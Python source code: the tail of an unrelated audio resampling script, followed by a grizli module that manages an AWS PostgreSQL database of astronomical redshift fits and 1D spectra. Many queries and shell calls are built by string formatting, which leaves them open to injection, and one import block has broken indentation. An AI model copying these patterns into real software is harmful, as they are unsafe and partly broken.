print("suggested N: %d, beta: %d" % (N,beta))
# The filter actually used: fixed 24 taps per polyphase branch
depth = 24
beta = 4
N = depth * ups_ratio
print("N: %d, beta: %d" % (N,beta))
print("polyphase depth: %d\n" % (N/ups_ratio))
# reqmem = N * 16 / 1024.0 / 2;
# print("reqmem: %fKb\n" % reqmem)
# w = ('kaiser', beta)
w = 'blackmanharris'
taps = signal.firwin(N, cutoff = audible_freq, window = w, nyq = nyq_rate)
def f(x):
    # Reference float polyphase resampler
    return apply_filter(x, taps, ups_ratio, dec_ratio)
htaps = half_filter(taps)
rhtaps = reorder_half_filter(htaps, ups_ratio, dec_ratio)
# Fixed-point emulation: quantize taps with the `ups` gain folded in
tapsbits = 24
rhetaps = float_to_fixed(rhtaps * ups_ratio, tapsbits)
srcbits = 24
def f2(x):
    # Integer (fixed-point) resampler; rescale result back to floats
    xi = float_to_fixed(x, srcbits)
    resi = apply_filter_half_reordered_emu(xi, rhetaps, ups_ratio, dec_ratio)
    scale = 1.0 / ((1 << (srcbits-1 + tapsbits-1)) - 1)
    res = [float(x) * scale for x in resi]
    return res
sin1khz = gen_sin(-0.1, 1000, from_rate, 1)
test_sin1khz(f2)
# test_sweep(f)
# (end of resampling experiment script)
"""
Interact with the grizli AWS database
"""
import os
import glob
import numpy as np
try:
import pandas as pd
except:
pd = None
from .. import utils
# Processing-state codes stored in the `status` column of the
# redshift_fit table (higher = further along the pipeline)
FLAGS = {'init_lambda': 1,
         'start_beams': 2,
         'done_beams': 3,
         'no_run_fit': 4,
         'start_redshift_fit': 5,
         'fit_complete': 6}
COLUMNS = ['root', 'id', 'status', 'ra', 'dec', 'ninput', 'redshift', 'as_epsf', 't_g102', 'n_g102', 'p_g102', 't_g141', 'n_g141', 'p_g141', 't_g800l', 'n_g800l', 'p_g800l', 'numlines', 'haslines', 'chi2poly', 'chi2spl', 'splf01', 'sple01', 'splf02', 'sple02', 'splf03', 'sple03', 'splf04', 'sple04', 'huberdel', 'st_df', 'st_loc', 'st_scl', 'dof', 'chimin', 'chimax', 'bic_poly', 'bic_spl', 'bic_temp', 'z02', 'z16', 'z50', 'z84', 'z97', 'zwidth1', 'zwidth2', 'z_map', 'zrmin', 'zrmax', 'z_risk', 'min_risk', 'd4000', 'd4000_e', 'dn4000', 'dn4000_e', 'dlineid', 'dlinesn', 'flux_pab', 'err_pab', 'ew50_pab', 'ewhw_pab', 'flux_hei_1083', 'err_hei_1083', 'ew50_hei_1083', 'ewhw_hei_1083', 'flux_siii', 'err_siii', 'ew50_siii', 'ewhw_siii', 'flux_oii_7325', 'err_oii_7325', 'ew50_oii_7325', 'ewhw_oii_7325', 'flux_ariii_7138', 'err_ariii_7138', 'ew50_ariii_7138', 'ewhw_ariii_7138', 'flux_sii', 'err_sii', 'ew50_sii', 'ewhw_sii', 'flux_ha', 'err_ha', 'ew50_ha', 'ewhw_ha', 'flux_oi_6302', 'err_oi_6302', 'ew50_oi_6302', 'ewhw_oi_6302', 'flux_hei_5877', 'err_hei_5877', 'ew50_hei_5877', 'ewhw_hei_5877', 'flux_oiii', 'err_oiii', 'ew50_oiii', 'ewhw_oiii', 'flux_hb', 'err_hb', 'ew50_hb', 'ewhw_hb', 'flux_oiii_4363', 'err_oiii_4363', 'ew50_oiii_4363', 'ewhw_oiii_4363', 'flux_hg', 'err_hg', 'ew50_hg', 'ewhw_hg', 'flux_hd', 'err_hd', 'ew50_hd', 'ewhw_hd', 'flux_h7', 'err_h7', 'ew50_h7', 'ewhw_h7', 'flux_h8', 'err_h8', 'ew50_h8', 'ewhw_h8', 'flux_h9', 'err_h9', 'ew50_h9', 'ewhw_h9', 'flux_h10', 'err_h10', 'ew50_h10', 'ewhw_h10', 'flux_neiii_3867', 'err_neiii_3867', 'ew50_neiii_3867', 'ewhw_neiii_3867', 'flux_oii', 'err_oii', 'ew50_oii', 'ewhw_oii', 'flux_nevi_3426', 'err_nevi_3426', 'ew50_nevi_3426', 'ewhw_nevi_3426', 'flux_nev_3346', 'err_nev_3346', 'ew50_nev_3346', 'ewhw_nev_3346', 'flux_mgii', 'err_mgii', 'ew50_mgii', 'ewhw_mgii', 'flux_civ_1549', 'err_civ_1549', 'ew50_civ_1549', 'ewhw_civ_1549', 'flux_ciii_1908', 'err_ciii_1908', 'ew50_ciii_1908', 'ewhw_ciii_1908', 'flux_oiii_1663', 
'err_oiii_1663', 'ew50_oiii_1663', 'ewhw_oiii_1663', 'flux_heii_1640', 'err_heii_1640', 'ew50_heii_1640', 'ewhw_heii_1640', 'flux_niii_1750', 'err_niii_1750', 'ew50_niii_1750', 'ewhw_niii_1750', 'flux_niv_1487', 'err_niv_1487', 'ew50_niv_1487', 'ewhw_niv_1487', 'flux_nv_1240', 'err_nv_1240', 'ew50_nv_1240', 'ewhw_nv_1240', 'flux_lya', 'err_lya', 'ew50_lya', 'ewhw_lya', 'pdf_max', 'cdf_z', 'sn_pab', 'sn_hei_1083', 'sn_siii', 'sn_oii_7325', 'sn_ariii_7138', 'sn_sii', 'sn_ha', 'sn_oi_6302', 'sn_hei_5877', 'sn_oiii', 'sn_hb', 'sn_oiii_4363', 'sn_hg', 'sn_hd', 'sn_h7', 'sn_h8', 'sn_h9', 'sn_h10', 'sn_neiii_3867', 'sn_oii', 'sn_nevi_3426', 'sn_nev_3346', 'sn_mgii', 'sn_civ_1549', 'sn_ciii_1908', 'sn_oiii_1663', 'sn_heii_1640', 'sn_niii_1750', 'sn_niv_1487', 'sn_nv_1240', 'sn_lya', 'chinu', 'bic_diff', 'log_risk', 'log_pdf_max', 'zq', 'mtime', 'vel_bl', 'vel_nl', 'vel_z', 'vel_nfev', 'vel_flag', 'grizli_version']
# Module-level SQLAlchemy engine placeholder; stays None until set by
# calling code (several helpers below reference it directly)
engine = None
def get_connection_info(config_file=None):
    """
    Read the database connection info.

    Defaults to the packaged ``../data/db.yml``; a ``~/db.local.yml``
    file overrides it when present.  Returns the parsed YAML dict.
    """
    import yaml
    if config_file is None:
        config_file = os.path.join(os.path.dirname(__file__),
                                   '../data/db.yml')
    # Prefer a local override next to the user's home directory
    home = os.getenv('HOME')
    if home is not None:
        local_file = os.path.join(home, 'db.local.yml')
        if os.path.exists(local_file):
            # print('Use ~/db.local.yml')
            config_file = local_file
    # `with` guarantees the handle is closed even if parsing fails
    # (the original leaked the descriptor on exceptions)
    with open(config_file) as fp:
        try:
            db_info = yaml.load(fp, Loader=yaml.FullLoader)
        except AttributeError:
            # PyYAML < 5.1 has no FullLoader
            db_info = yaml.load(fp)
    return db_info
def get_db_engine(config=None, echo=False):
    """
    Generate an SQLAlchemy engine for the grizli database

    If ``$HOME/db.iam.yaml`` exists, an RDS IAM auth token is generated
    and used as the password; otherwise credentials come from
    `get_connection_info` (or the `config` dict passed in).
    """
    from sqlalchemy import create_engine
    import sqlalchemy.pool as pool
    import psycopg2
    import boto3
    # With IAM auth
    iam_file = os.path.join(os.getenv('HOME'), 'db.iam.yaml')
    if os.path.exists(iam_file):
        config = get_connection_info(config_file=iam_file)
        session = boto3.Session()
        client = session.client('rds', region_name=config['region'])
        # Short-lived token used in place of a static password
        token = client.generate_db_auth_token(DBHostname=config['hostname'],
                                              Port=config['port'],
                                              DBUsername=config['username'],
                                              Region=config['region'])
        # conn = psycopg2.connect(host=config['hostname'],
        #                         port=config['port'],
        #                         database=config['database'],
        #                         user=config['username'],
        #                         password=token,
        #                         sslrootcert="SSLCERTIFICATE")
        #
        # engine = create_engine('postgresql+psycopg2://', creator=POOL.getconn)
        connect_args = dict(host=config['hostname'],
                            port=config['port'],
                            database=config['database'],
                            user=config['username'],
                            password=token,
                            sslrootcert="SSLCERTIFICATE")
        engine = create_engine('postgresql+psycopg2://',
                               connect_args=connect_args)
        # Early return: the password-based path below is skipped
        return engine
    if config is None:
        config = get_connection_info()
    db_string = "postgresql://{0}:{1}@{2}:{3}/{4}"
    db_string = db_string.format(config['username'], config['password'],
                                 config['hostname'], config['port'],
                                 config['database'])
    engine = create_engine(db_string, echo=echo)
    return engine
def get_redshift_fit_status(root, id, table='redshift_fit', engine=None):
    """
    Get status value from the database for root_id object.

    Returns -1 when no row exists for (root, id).
    """
    import pandas as pd
    if engine is None:
        engine = get_db_engine(echo=False)
    query = "SELECT status FROM {2} WHERE (root = '{0}' AND id = {1})".format(root, id, table)
    res = pd.read_sql_query(query, engine)
    if len(res) == 0:
        return -1
    return res['status'][0]
def update_jname():
    """
    Exploratory helper: build J2000 target-name strings for the photometry
    table and flag duplicate redshift-fit rows (same object fit in both an
    IR grism and G800L).

    NOTE(review): relies on the module-level `engine`, which is None at
    import time -- set it before running.  `cosd` and the first `dup`
    assignment are computed but unused/overwritten.
    """
    from grizli import utils
    from grizli.aws import db as grizli_db
    res = grizli_db.from_sql("select p_root, p_id, p_ra, p_dec from photometry_apcorr", engine)
    jn = [utils.radec_to_targname(ra=ra, dec=dec, round_arcsec=(0.001, 0.001), precision=2, targstr='j{rah}{ram}{ras}.{rass}{sign}{ded}{dem}{des}.{dess}') for ra, dec in zip(res['p_ra'], res['p_dec'])]
    for c in res.colnames:
        res.rename_column(c, c.replace('p_', 'j_'))
    zres = grizli_db.from_sql("select root, phot_root, id, ra, dec, z_map,"
                              "q_z, t_g800l, t_g102, t_g141, status from "
                              "redshift_fit where ra is not null and "
                              "status > 5", engine)
    # Find duplicates: nearest-neighbor pairs closer than 0.01 arcsec
    from scipy.spatial import cKDTree
    data = np.array([zres['ra'], zres['dec']]).T
    ok = zres['q_z'].filled(-100) > -0.7
    tree = cKDTree(data[ok])
    dr, ix = tree.query(data[ok], k=2)
    cosd = np.cos(data[:, 1]/180*np.pi)
    dup = (dr[:, 1] < 0.01/3600)  # & (zres['phot_root'][ix[:,0]] != zres['phot_root'][ix[:,1]])
    ix0 = ix[:, 0]
    ix1 = ix[:, 1]
    dup = (dr[:, 1] < 0.01/3600)
    dup &= (zres['phot_root'][ok][ix0] == zres['phot_root'][ok][ix1])
    dup &= (zres['id'][ok][ix0] == zres['id'][ok][ix1])
    # second is G800L
    dup &= zres['t_g800l'].filled(0)[ok][ix1] > 10
    # plt.scatter(zres['z_map'][ok][ix0[dup]], zres['z_map'][ok][ix1[dup]],
    #             marker='.', alpha=0.1)
def update_redshift_fit_status(root, id, status=0, table='redshift_fit', engine=None, verbose=True):
    """
    Set the status flag in the table.

    Inserts a stub row (root, id, status, mtime) when the object is not
    in the table yet, otherwise updates `status` and `mtime` in place.
    """
    import time
    import pandas as pd
    from astropy.table import Table
    from astropy.time import Time
    NOW = Time.now().iso
    if engine is None:
        engine = get_db_engine(echo=False)
    old_status = get_redshift_fit_status(root, id, table=table, engine=engine)
    if old_status < 0:
        # Need to add an empty row
        tab = Table()
        tab['root'] = [root]
        tab['id'] = [id]
        tab['status'] = [status]
        tab['mtime'] = [NOW]
        row_df = tab.to_pandas()
        add_redshift_fit_row(row_df, engine=engine, table=table,
                             verbose=verbose)
    else:
        sqlstr = """UPDATE {0}
            SET status = {1}, mtime = '{2}'
            WHERE (root = '{3}' AND id = {4});
            """.format(table, status, NOW, root, id)
        if verbose:
            msg = 'Update status for {0} {1}: {2} -> {3} on `{4}` ({5})'
            print(msg.format(root, id, old_status, status, table, NOW))
        # Consistency: execute_helper already handles both psycopg2
        # connections and sqlalchemy engines -- don't duplicate the branch
        execute_helper(sqlstr, engine)
def execute_helper(sqlstr, engine):
    """
    Run `sqlstr` on either a psycopg2 connection or an sqlalchemy engine
    (they expose different execution APIs).
    """
    cursor_factory = getattr(engine, 'cursor', None)
    if cursor_factory is None:
        # sqlalchemy-style engine executes directly
        engine.execute(sqlstr)
    else:
        # psycopg2-style connection goes through a cursor context
        with cursor_factory() as cur:
            cur.execute(sqlstr)
def get_row_data(rowfile='gds-g800l-j033236m2748_21181.row.fits', status_flag=FLAGS['fit_complete']):
    """
    Convert table from a row file to a pandas DataFrame.

    `rowfile` may be a FITS filename, an ascii stellar-fit filename, or an
    astropy Table.  Columns not known to the database table are dropped;
    the `cdf_z` array column is re-attached as a list column at the end.
    """
    import pandas as pd
    from astropy.table import Table
    from astropy.time import Time
    NOW = Time.now().iso
    # Default column whitelist.  The original only assigned this inside the
    # isinstance(rowfile, str) branch, so passing a Table object directly
    # raised NameError at the column filter below.
    allowed_columns = COLUMNS
    if isinstance(rowfile, str):
        if rowfile.endswith('.fits'):
            tab = Table.read(rowfile, character_as_bytes=False)
        else:
            # Output of stellar fits
            tab = Table.read(rowfile, format='ascii.commented_header')
            tab['chinu'] = tab['chi2']/tab['dof']
            tab['phot_root'] = tab['root']
            tab.rename_column('best_template', 'stellar_template')
            try:
                tab['chinu'] = tab['chi2']/tab['dof']
                tab['phot_root'] = tab['root']
                # BIC of spline-only and template fits
                bic_spl = np.log(tab['dof'])*(tab['nk']-1) + tab['chi2_flat']
                bic_star = np.log(tab['dof'])*(tab['nk']) + tab['chi2']
                tab['bic_diff_star'] = bic_spl - bic_star
            except Exception:
                # best-effort: some stellar-fit files lack these columns
                print('Parse {0} failed'.format(rowfile))
            allowed_columns = ['root', 'id', 'ra', 'dec', 'chi2', 'nk', 'dof',
                               'chinu', 'chi2_flat', 'bic_diff_star', 'mtime',
                               'stellar_template', 'status', 'phot_root',
                               'as_epsf']
    else:
        tab = rowfile
    # cdf_z is an array-valued column pandas can't ingest directly
    if 'cdf_z' in tab.colnames:
        cdf_z = tab['cdf_z'].data
        tab.remove_column('cdf_z')
    else:
        cdf_z = None
    tab['mtime'] = NOW
    tab['status'] = status_flag
    # Normalize column names: '-' -> '_', lower case
    for c in tab.colnames:
        if '-' in c:
            tab.rename_column(c, c.replace('-', '_'))
    for c in tab.colnames:
        tab.rename_column(c, c.lower())
    # Remove columns not in the database
    remove_cols = []
    for c in tab.colnames:
        if c not in allowed_columns:
            #print('Remove column: ', c)
            remove_cols.append(c)
    if len(remove_cols) > 0:
        tab.remove_columns(remove_cols)
    row_df = tab.to_pandas()
    if cdf_z is not None:
        row_df['cdf_z'] = cdf_z.tolist()
    return row_df
def delete_redshift_fit_row(root, id, table='redshift_fit', engine=None):
    """
    Delete a row from the redshift fit table
    """
    if engine is None:
        engine = get_db_engine(echo=False)
    sql = "DELETE from {2} WHERE (root = '{0}' AND id = {1})".format(root, id, table)
    res = engine.execute(sql)
def add_redshift_fit_row(row_df, table='redshift_fit', engine=None, verbose=True):
    """
    Update the row in the redshift_fit table.

    `row_df` may be a DataFrame or the name of a row file; any existing
    row for the same (root, id) is deleted before the new one is appended.
    """
    if engine is None:
        engine = get_db_engine(echo=False)
    if isinstance(row_df, str):
        row_df = get_row_data(row_df)
    has_keys = ('root' in row_df.columns) & ('id' in row_df.columns)
    if not has_keys:
        print('Need at least "root" and "id" columns in the row data')
        return False
    obj_root = row_df['root'][0]
    obj_id = row_df['id'][0]
    status = get_redshift_fit_status(obj_root, obj_id, table=table, engine=engine)
    # Replace any previous entry for this object
    if status >= 0:
        print('Delete and update row for {0}/{1} on `{2}`'.format(obj_root, obj_id, table))
        delete_redshift_fit_row(obj_root, obj_id, table=table, engine=engine)
    else:
        print('Add row for {0}/{1} on `{2}`'.format(obj_root, obj_id, table))
    # Add the new data
    row_df.to_sql(table, engine, index=False, if_exists='append', method='multi')
###########
def add_missing_rows(root='j004404m2034', engine=None):
    """
    Add rows that were completed but that aren't in the table
    """
    import glob
    from astropy.table import vstack, Table
    import pandas as pd
    from grizli.aws import db as grizli_db
    if engine is None:
        engine = grizli_db.get_db_engine(echo=False)
    # Pull the row files for this root from S3
    os.system('aws s3 sync s3://grizli-v1/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*row.fits"'.format(root))
    row_files = sorted(glob.glob('{0}*row.fits'.format(root)))
    res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE root = '{0}' AND status=6".format(root), engine)
    res_ids = res['id'].to_list()
    tabs = []
    print('\n\n NROWS={0}, NRES={1}\n\n'.format(len(row_files), len(res)))
    # Push any completed row file whose id is missing from the database
    for rfile in row_files:
        file_id = int(rfile.split('.row.fits')[0][-5:])
        if file_id in res_ids:
            continue
        grizli_db.add_redshift_fit_row(rfile, engine=engine, verbose=True)
def convert_1D_to_lists(file='j234420m4245_00615.1D.fits'):
    """
    Convert 1D spectral data to lists suitable for putting into dataframes
    and sending to the databases.

    Returns a dict keyed by lower-case grism name, or False when the file
    is missing or has no spectral extensions.
    """
    from collections import OrderedDict
    import astropy.io.fits as pyfits
    from .. import utils
    if not os.path.exists(file):
        print('Spectrum file not found')
        return False
    im = pyfits.open(file)
    obj_id = im[0].header['ID']
    obj_root = im[0].header['TARGET']
    # R30 products drop the line/cont model columns
    if '.R30.' in file:
        skip_columns = ['line', 'cont']
        pref = 'spec1d_r30'
    else:
        skip_columns = []
        pref = 'spec1d'
    spectra = OrderedDict()
    for gr in ['G102', 'G141', 'G800L']:
        if gr not in im:
            continue
        sp = utils.GTable.read(file, hdu=gr)
        prefix = '{0}_{1}_'.format(pref, gr.lower())
        spd = {prefix+'id': obj_id, prefix+'root': obj_root}
        for c in sp.colnames:
            if c not in skip_columns:
                spd[prefix+c] = sp[c].tolist()
        spectra[gr.lower()] = spd
    return spectra if spectra else False
def send_1D_to_database(files=[], engine=None):
    """
    Send a list of 1D spectra to the spectra databases

    ToDo: check for existing lines

    NOTE(review): mutable default `files=[]` is never mutated here, so it
    is harmless, but callers should still pass an explicit list.
    """
    from collections import OrderedDict
    import pandas as pd
    if engine is None:
        engine = get_db_engine()
    # Accumulate columns per grism across all input files
    tables = OrderedDict()
    for file in files:
        sp_i = convert_1D_to_lists(file=file)
        print('Read spec1d file: {0}'.format(file))
        for gr in sp_i:
            # Initialize the columns
            if gr not in tables:
                tables[gr] = OrderedDict()
                for c in sp_i[gr]:
                    tables[gr][c] = []
            # Add the data
            for c in sp_i[gr]:
                tables[gr][c].append(sp_i[gr][c])
    # Table-name prefix follows the file flavor of the first input
    prefix = 'spec1d_r30' if '.R30.' in files[0] else 'spec1d'
    for gr in tables:
        tablename = '{0}_{1}'.format(prefix, gr)
        df = pd.DataFrame(tables[gr])
        # Put wavelengths in their own tables to avoid massive duplication
        wave_table = tablename+'_wave'
        if wave_table not in engine.table_names():
            print('Create wave table: '+wave_table)
            wdf = pd.DataFrame(data=tables[gr][wave_table][0],
                               columns=[wave_table])
            wdf.to_sql(wave_table, engine, if_exists='replace',
                       index=True, index_label=tablename+'_idx')
        # drop wave from spectra tables
        df.drop('{0}_wave'.format(tablename), axis=1, inplace=True)
        # Create table with array-valued columns sized from the first row
        if tablename not in engine.table_names():
            print('Initialize table {0}'.format(tablename))
            SQL = "CREATE TABLE {0} (\n".format(tablename)
            SQL += '    {0}_root text,\n'.format(tablename)
            SQL += '    {0}_id integer,\n'.format(tablename)
            for c in df.columns:
                item = df[c][0]
                if isinstance(item, list):
                    SQL += '    {0} real[{1}],\n'.format(c, len(item))
            engine.execute(SQL[:-2]+')')
            try:
                engine.execute("CREATE INDEX {0}_idx ON {0} ({0}_root, {0}_id);".format(tablename))
            except:
                pass
        # Delete existing duplicates
        if tablename in engine.table_names():
            SQL = """DELETE from {0} WHERE """.format(tablename)
            mat = ["({0}_root = '{1}' AND {0}_id = {2})".format(tablename, r, i) for r, i in zip(df[tablename+'_root'], df[tablename+'_id'])]
            SQL += 'OR '.join(mat)
            rsp = engine.execute(SQL)
        # Send the table
        print('Send {0} rows to {1}'.format(len(df), tablename))
        df.to_sql(tablename, engine, index=False, if_exists='append',
                  method='multi')
def add_all_spectra():
    """
    Send 1D spectra for every root in `redshift_fit` to the database,
    using a local 'log' file to checkpoint roots already processed so
    that reruns can skip them.
    """
    from grizli.aws import db as grizli_db
    roots = grizli_db.from_sql("select root,count(root) as n from redshift_fit group BY root order by n DESC", engine)
    o = 1
    for root in roots['root'][::o]:
        # The original crashed on the first run when 'log' did not exist,
        # and leaked file handles; use `with` and tolerate a missing file
        if os.path.exists('log'):
            with open('log') as fp:
                existing = fp.readlines()
        else:
            existing = []
        if root+'\n' in existing:
            print('Skip', root)
            continue
        with open('log', 'a') as fp:
            fp.write(root+'\n')
        try:
            grizli_db.add_oned_spectra(root=root, engine=engine)
        except Exception:
            # best-effort: move on to the next root on any failure
            pass
def add_oned_spectra(root='j214224m4420gr01', bucket='grizli-v1', engine=None):
    """
    Sync the 1D and R30 spectrum files for `root` from S3, push them to
    the spectra tables in batches, then delete the local copies.
    """
    import os
    import glob
    from collections import OrderedDict
    if engine is None:
        engine = get_db_engine()
    # (A per-file boto3 download also works; the bulk sync is simpler)
    os.system('aws s3 sync s3://{0}/Pipeline/{1}/Extractions/ ./ --exclude "*" --include "*R30.fits" --include "*1D.fits"'.format(bucket, root))
    nmax = 500  # files per database batch
    for suffix in ['1D', 'R30']:
        spec_files = glob.glob('{0}_*{1}.fits'.format(root, suffix))
        spec_files.sort()
        for i in range(len(spec_files)//nmax+1):
            batch = spec_files[i*nmax:(i+1)*nmax]
            send_1D_to_database(files=batch, engine=engine)
    os.system('rm {0}_*.1D.fits {0}_*.R30.fits'.format(root))
# Scratch/analysis code (disabled): pull many 1D spectra from the
# database, normalize by the continuum at a rest wavelength `wnorm`,
# shift to a common rest frame in log-lambda, and stack into binned
# 2D images.  Relies on `root`, `engine`, `pd`, `np`, `OrderedDict`
# being defined in the interactive session.
if False:
    import scipy.ndimage as nd
    import matplotlib.pyplot as plt
    tablename = 'spec1d_g141'
    #tablename = 'spec1d_g102'
    #tablename = 'spec1d_r30_g141'
    if 1:
        # by root
        resp = pd.read_sql_query("SELECT root, id, z_map, q_z, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND root = '{0}' AND q_z > -0.7 ORDER BY z_map".format(root, tablename), engine)
    else:
        # everything
        resp = pd.read_sql_query("SELECT root, id, z_map, q_z, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.7 ORDER BY z_map".format(root, tablename), engine)
    # Halpha EW
    resp = pd.read_sql_query("SELECT root, id, z_map, q_z, ew50_ha, flux_ha, err_ha, t_g141, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.3 AND err_ha > 0 ORDER BY ew50_ha".format(root, tablename), engine)
    # Everything
    fresp = pd.read_sql_query("SELECT root, id, z_map, q_z, ew50_ha, flux_ha, err_ha, ew50_oiii, ew50_hb, ew50_oii, d4000, d4000_e, t_g141, t_g102, t_g800l, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.7 AND chinu < 2 ORDER BY z_map".format(root, tablename), engine)
    wave = pd.read_sql_query("SELECT * from {0}_wave".format(tablename),
                             engine)[tablename+'_wave'].values
    resp = fresp
    sort_column = 'z_map'
    bin_factor = 1
    # Normalize at rest-frame wnorm Angstroms
    wnorm = 6400
    zref = 1.3e4/wnorm-1
    sel = np.isfinite(fresp[sort_column]) & (fresp[sort_column] != -99)
    norm_ix = np.interp(wnorm*(1+fresp['z_map']), wave, np.arange(len(wave)), left=np.nan, right=np.nan)
    sel &= np.isfinite(norm_ix)
    resp = fresp[sel]
    norm_ix = np.cast[int](np.round(np.interp(wnorm*(1+resp['z_map']), wave, np.arange(len(wave)), left=np.nan, right=np.nan)))
    resp.sort_values(sort_column, inplace=True)
    if tablename == 'spec1d_g141':
        exptime = resp['t_g141'].values
        wlim = [1.1e4, 1.65e4]
    else:
        exptime = resp['t_g102'].values
        wlim = [8000, 1.1e4, 1.65e4]
    # Unpack array-valued DB columns into 2D numpy arrays
    data = OrderedDict()
    for c in resp.columns:
        if c.startswith(tablename):
            c_i = c.split(tablename+'_')[1]
            try:
                data[c_i] = np.array(resp[c].values.tolist())
            except:
                pass
    #plt.imshow((data['flux'] - data['cont'])/data['flat']/1.e-19, vmin=-0.1, vmax=10)
    # Rest-frame
    dz = np.diff(wave)[10]/wave[10]
    max_zshift = np.cast[int](np.log(1+resp['z_map'].max())/dz)
    zshift = np.cast[int]((np.log(1+resp['z_map']) - np.log(1+zref))/dz)
    err_max = 5
    # Continuum normalized
    #norm = data['cont'][:,100]/data['flat'][:,100]
    norm = np.zeros(len(resp))
    for i, ix in enumerate(norm_ix):
        norm[i] = data['line'][i, ix]/data['flat'][i, ix]
    #norm = np.mean(data['cont'][:,50:120]/data['flat'][:,50:120], axis=1)
    # 2D arrays
    normed = ((data['flux']/data['flat']).T/norm).T
    cnormed = ((data['cont']/data['flat']).T/norm).T
    lnormed = (((data['line']-data['cont'])/data['flat']).T/norm).T
    err = ((data['err']/data['flat']).T/norm).T
    mask = np.isfinite(norm) & (norm > 0) & np.isfinite(norm_ix)
    normed = normed[mask, :]
    cnormed = cnormed[mask, :]
    lnormed = lnormed[mask, :]
    err = err[mask, :]
    ivar = 1/err**2
    ivar[err <= 0] = 0
    # Weight by exposure time
    ivar = (ivar.T*0+(exptime[mask]/4000.)*norm[mask]).T
    zshift = zshift[mask]
    # Clip edges
    wclip = (wave > wlim[0]) & (wave < wlim[1])
    mask_val = 1e10
    normed[:, ~wclip] = -mask_val
    cnormed[:, ~wclip] = -mask_val
    lnormed[:, ~wclip] = -mask_val
    # Roll each spectrum to the common rest frame
    sh = normed.shape
    rest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val
    crest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val
    lrest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val
    rest[:, zshift.max():zshift.max()+sh[1]] = normed*1
    crest[:, zshift.max():zshift.max()+sh[1]] = cnormed*1
    lrest[:, zshift.max():zshift.max()+sh[1]] = lnormed*1
    rest_ivar = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min()))
    rest_ivar[:, zshift.max():zshift.max()+sh[1]] = ivar*1
    for i in range(sh[0]):
        rest[i, :] = np.roll(rest[i, :], -zshift[i])
        crest[i, :] = np.roll(crest[i, :], -zshift[i])
        lrest[i, :] = np.roll(lrest[i, :], -zshift[i])
        rest_ivar[i, :] = np.roll(rest_ivar[i, :], -zshift[i])
    ok = np.isfinite(rest) & np.isfinite(rest_ivar) & (rest > -0.8*mask_val)
    rest_ivar[~ok] = 0
    rest[~ok] = -mask_val
    crest[~ok] = -mask_val
    lrest[~ok] = -mask_val
    # Inverse-variance weighted binning along the object axis
    shr = rest.shape
    nbin = int((shr[0]//shr[1])//2*bin_factor)*2
    kernel = np.ones((1, nbin)).T
    # npix = np.maximum(nd.convolve((rest > -0.8*mask_val)*1, kernel), 1)
    # srest = nd.convolve(rest*(rest > -0.8*mask_val), kernel)
    # sbin = (srest/npix)[::nbin,:]
    # plt.imshow(sbin, vmin=0, vmax=5)
    num = nd.convolve(rest*rest_ivar, kernel)
    cnum = nd.convolve(crest*rest_ivar, kernel)
    lnum = nd.convolve(lrest*rest_ivar, kernel)
    den = nd.convolve(rest_ivar, kernel)
    wbin = (num/den)[::nbin, :]
    wbin[~np.isfinite(wbin)] = 0
    cwbin = (cnum/den)[::nbin, :]
    cwbin[~np.isfinite(cwbin)] = 0
    lwbin = (lnum/den)[::nbin, :]
    lwbin[~np.isfinite(lwbin)] = 0
    plt.imshow(wbin, vmin=0, vmax=5)
    plt.imshow((data['line'] - data['cont'])/data['flat']/1.e-19, vmin=-0.1, vmax=10)
def run_lambda_fits(root='j004404m2034', phot_root=None, mag_limits=[15, 26], sn_limit=7, min_status=None, engine=None, zr=[0.01, 3.4], bucket='grizli-v1', verbose=True, extra={'bad_pa_threshold': 10}, ids=None):
    """
    Run redshift fits on lambda for a given root.

    Objects are selected from the `phot_root` photometry catalog (defaults
    to `root`) by magnitude, S/N, size and grism coverage, or passed
    explicitly via `ids` / encoded `min_status` values.
    """
    from grizli.aws import fit_redshift_lambda
    from grizli import utils
    from grizli.aws import db as grizli_db
    if engine is None:
        engine = grizli_db.get_db_engine()
    import pandas as pd
    import numpy as np
    import glob
    import os
    print('Sync phot catalog')
    if phot_root is None:
        # BUGFIX: was the no-op `root = root`, which left phot_root=None
        # and broke the sync path and catalog filename below
        phot_root = root
    os.system('aws s3 sync s3://{1}/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*_phot*.fits"'.format(phot_root, bucket))
    print('Sync wcs.fits')
    os.system('aws s3 sync s3://{1}/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*_phot*.fits" --include "*wcs.fits"'.format(root, bucket))
    phot = utils.read_catalog('{0}_phot_apcorr.fits'.format(phot_root))
    # Count how many grism pointings cover each object
    phot['has_grism'] = 0
    wcs_files = glob.glob('*wcs.fits')
    for f in wcs_files:
        w = utils.WCSFootprint(f, ext=0)
        has = w.path.contains_points(np.array([phot['ra'], phot['dec']]).T)
        print(f, has.sum())
        phot['has_grism'] += has
    # Magnitude and S/N from the reddest available total-flux band
    mag = phot['mag_auto']*np.nan
    mag_filt = np.array([' ']*len(phot))
    sn = phot['mag_auto']*np.nan
    for filt in ['f160w', 'f140w', 'f125w', 'f105w', 'f110w', 'f098m', 'f814w', 'f850lp', 'f606w', 'f775w']:
        if '{0}_tot_1'.format(filt) in phot.colnames:
            mag_i = 23.9-2.5*np.log10(phot['{0}_tot_1'.format(filt)])
            fill = (~np.isfinite(mag)) & np.isfinite(mag_i)
            mag[fill] = mag_i[fill]
            mag_filt[fill] = filt
            sn_i = phot['{0}_tot_1'.format(filt)]/phot['{0}_etot_1'.format(filt)]
            sn[fill] = sn_i[fill]
    sel = np.isfinite(mag) & (mag >= mag_limits[0]) & (mag <= mag_limits[1]) & (phot['has_grism'] > 0)
    sel &= phot['flux_radius'] > 1
    sel &= sn > sn_limit
    if min_status is not None:
        # Only (re)fit objects whose current status is below min_status
        res = pd.read_sql_query("SELECT root, id, status, mtime FROM redshift_fit WHERE root = '{0}'".format(root), engine)
        if len(res) > 0:
